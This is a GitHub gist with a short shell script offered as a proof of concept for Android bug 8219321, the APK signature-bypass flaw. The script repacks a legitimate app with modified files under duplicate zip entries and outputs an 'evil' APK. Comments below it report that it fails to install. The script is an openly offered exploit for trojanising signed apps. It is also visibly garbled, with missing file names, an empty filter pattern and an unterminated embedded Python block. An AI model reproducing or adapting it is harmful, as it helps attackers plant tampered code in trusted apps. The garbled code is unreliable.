Skip to content

Instantly share code, notes, and snippets.

Created July 8, 2013 10:35
Star You must be signed in to star a gist
What would you like to do?
Quick & dirty PoC for Android bug 8219321 discovered by BlueboxSec
# PoC for Android bug 8219321 by @pof
# +info:
if [ -z $1 ]; then echo "Usage: $0 <file.apk>" ; exit 1 ; fi
rm -r out out.apk tmp 2>/dev/null
java -jar apktool.jar d $APK out
#apktool d $APK out
echo "Modify files, when done type 'exit'"
cd out
cd ..
java -jar apktool.jar b out out.apk
#apktool b out out.apk
mkdir tmp
cd tmp/
unzip ../$APK
mv ../out.apk .
cat > <<-EOF
import zipfile
import sys
z = zipfile.ZipFile(sys.argv[1], "a")
chmod 755
for f in `find . -type f |egrep -v "(|out.apk)"` ; do ./ out.apk "$f" ; done
cp out.apk ../evil-$APK
cd ..
rm -rf tmp out
echo "Modified APK: evil-$APK"
Copy link

I tried with script. And also, ive tried adding duplicate classes.dex alone in the APK and trying to install on device, but unable to install.

Even with the old android, versions. Any idea on what am i missing?

Copy link

@esotericnomen have you solved the problem ?

Copy link

I have also met this problem.Is there any solutions?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment